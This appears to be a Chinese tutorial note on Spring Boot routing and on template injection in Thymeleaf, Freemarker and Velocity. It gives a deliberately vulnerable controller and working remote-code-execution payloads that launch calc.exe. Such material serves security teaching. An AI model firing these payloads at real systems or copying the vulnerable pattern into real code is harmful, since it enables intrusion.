当前位置: 首页 > wzjs >正文

如何让产品吸引顾客优化网络软件

wzjs 2025/8/11 2:26:34
如何让产品吸引顾客,优化网络软件,做网站后的总结,酒吧网站建设报价模板#知识点 1、安全开发-JavaEE-开发框架-SpringBoot&路由&传参 2、安全开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity 一、开发框架-SpringBoot 参考:https://springdoc.cn/spring-boot/ 访问SpringBoot创建的网站 1、路由映射 RequestMapping…
#知识点

1、安全开发-JavaEE-开发框架-SpringBoot&路由&传参

2、安全开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

一、开发框架-SpringBoot

参考:https://springdoc.cn/spring-boot/

访问SpringBoot创建的网站

1、路由映射

@RequestMapping @GetMapping@PostMapping等

访问路由地址

为get,post请求设置路由

 get请求

post请求

2、参数传递

@RequestParam

//GET请求并传递参数

//Post请求并传递参数

3、数据响应

@RestController @Controller

@RestController注解相当于@ResponseBody+@Controller合作用。

二、模版引擎->Thymeleaf

参考:https://xz.aliyun.com/news/9962

1、新建SpringBoot项目包含Web,Thymeleaf

2、配置application.properties修改缓存为false

3、创建模版目录和文件,文件定义修改变量

创建模板文件文件index.html,并谷歌访问

4、新建Controller目录及文件,指定路由配置

访问

5、更换SpringBoot及Thymeleaf版本测试POC

@Controller

public class IndexController {

@RequestMapping("/index")

public String index(Model model) {

//替换模版html文件中的data变量值

model.addAttribute("data", "你好 小迪");

//使用index模版文件

return "index";

}

@RequestMapping("/indexs")

public String index(Model model,@RequestParam String lang) {

//替换模版html文件中的data变量值

model.addAttribute("data", "Hello xiaodi");

//使用index+变量lang模版文件

return "index-"+lang;

}

}

访问英文

访问中文

利用条件:Thymeleaf漏洞版本,可控模版变量lang->可以控制调用哪个模板

Poc利用命令如下:

__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc.exe%22).getInputStream()).next()%7d__::.x->lang参数

三、Freemarker

参考:https://mp.weixin.qq.com/s/TtNxfSYsB4HMEpW_OBniew

1、新建SpringBoot项目包含Web,Freemarker

2、配置application.properties修改缓存

3、创建模版目录和文件,文件定义修改变量

4、新建Controller目录及文件,指定路由配置

5、更换SpringBoot及Freemarker版本测试POC->特别注意:这个poc要放在渲染文件中才行->通过上面的username变量传参poc(不会引起poc执行)

<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}

<#assign value="freemarker.template.utility.JythonRuntime"?new()>${value("calc.exe")}<@value>import os;os.system("calc.exe")</@value>//@value为自定义标签

利用条件:可控渲染的模版文件(其实就是该模板的功能上有漏洞,导致上面的poc放到文件里面可以执行RCE),不受该模板版本的影响

四、Velocity

参考:https://blog.csdn.net/2401_83799022/article/details/141600988

<dependency>

<groupId>org.apache.velocity</groupId>

<artifactId>velocity</artifactId>

<version>1.7</version>

</dependency>

1、Velocity.evaluate

2、template.merge(ctx, out)

Poc利用:

%23set($e%3D"e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")

利用条件:Velocity漏洞版本(出现在特点的版本),可控模版变量或文件,如上面的username参数可控

http://www.dtcms.com/wzjs/286212.html

相关文章:

  • 电子商务网站建设与管理答案优秀的软文广告欣赏
  • 微信免费建站长沙seo咨询
  • 沈阳做网站建设数据分析师一般一个月多少钱
  • 比较冷门的视频网站做搬运电商广告网络推广
  • 学网站开发推荐书推广引流工具
  • 做淘宝还是做网站容易电子商务网站建设方案
  • 欧美在路边给了钱就可以做网站网络广告策划书案例
  • 做爰视频在线观看免费网站seo推广排名
  • 郑州网站开发网站开发微信广告投放平台
  • 长沙网站建设 个人网络营销渠道名词解释
  • php和网站开发外贸推广是做什么的
  • 网站建站图片关系营销案例
  • 企业网站建设实训指导书整站优化加盟
  • 深圳市建设厅网站跨国网站浏览器
  • 武汉肥猫科技商城网站建设产品软文怎么写
  • 电商网站建设与运营方向自己网站怎么推广
  • 长沙仿站模板网站建设百度贴吧网页版登录
  • 网站推广的四个阶段包括西安网站建设公司十强
  • 恶搞网站在线制作生成器产品推广网站哪个好
  • wordpress大型网站朋友圈营销广告
  • 淮北官方网站百度推广后台登陆
  • 怎么给网站做搜索功能徐州百度推广
  • 网络营销公微信seo排名优化软件
  • 怎么做网站像淘宝这样的电商培训班一般多少钱
  • 付费小说网站怎么做seo价格查询公司
  • 佛山做网站业务工资附近电脑培训班零基础
  • 安徽省工程建设监理协会网站成人教育培训机构排名
  • 哪有可以专门做外包项目的网站志鸿优化设计答案网
  • 潍坊网站建设外贸营销软文范文200字
  • 做网站硬件工程是什么百度网址大全手机版